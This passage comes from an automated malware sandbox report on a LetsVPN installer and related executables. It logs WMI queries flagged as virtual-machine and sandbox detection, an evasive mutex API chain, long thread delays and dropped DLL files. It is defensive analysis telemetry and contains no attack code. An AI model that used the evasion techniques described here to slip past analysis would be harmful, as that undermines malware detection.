Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\Desktop\KLL.exe

Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess

graph_0-18690

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{54E56422-6955-47A6-BEF2-9742B76DD9E9}"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select MACAddress From Win32_NetworkAdapter WHERE ((MACAddress Is Not NULL) AND (Manufacturer <> 'Microsoft'))
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{54E56422-6955-47A6-BEF2-9742B76DD9E9}"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_networkadapterconfiguration where ServiceName = 'tap0901'
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_NetworkAdapterConfiguration.Index=10::EnableStatic
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where GUID="{54E56422-6955-47A6-BEF2-9742B76DD9E9}"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::PutInstance - root\cimv2 : Win32_NetworkAdapter.DeviceID="10"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapter where ServiceName="tap0901"
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_NetworkAdapterConfiguration where SettingID="{54E56422-6955-47A6-BEF2-9742B76DD9E9}"

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Memory allocated: 1830000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Memory allocated: 3520000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Memory allocated: 3430000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Memory allocated: 1500000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Memory allocated: 3150000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Memory allocated: 2FC0000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 300000
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 236147
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Window / User API: threadDelayed 9303	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1769
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8654
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1071
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Window / User API: threadDelayed 1774
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Window / User API: threadDelayed 1959
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Window / User API: threadDelayed 3129

Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\WpfAnimatedGif.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Specialized.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\CommunityToolkit.Mvvm.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\ndp462-web.exe	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Pipes.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\PusherClient.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.nativelibrary.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNDomainModel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Net.Ping.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Hardcodet.Wpf.TaskbarNotification.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.AccessControl.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Principal.Windows.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.ValueTuple.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XDocument.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Analytics.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Drawing.Common.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Utils.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Buffers.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-arm\native\e_sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Text.Encoding.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.Compression.ZipFile.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Xml.XPath.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\runtimes\win-x86\native\e_sqlite3.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\nsExec.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Security.Cryptography.Encoding.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Thread.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\x86\WebView2Loader.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsu57BB.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Newtonsoft.Json.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Globalization.Extensions.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Threading.Tasks.Parallel.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Runtime.Numerics.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.batteries_v2.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.dll	Jump to dropped file
Source: C:\ProgramData\letsvpn-latest.exe	Dropped PE file which has not been started: C:\Program Files (x86)\letsvpn\app-3.7.0\System.Linq.dll	Jump to dropped file
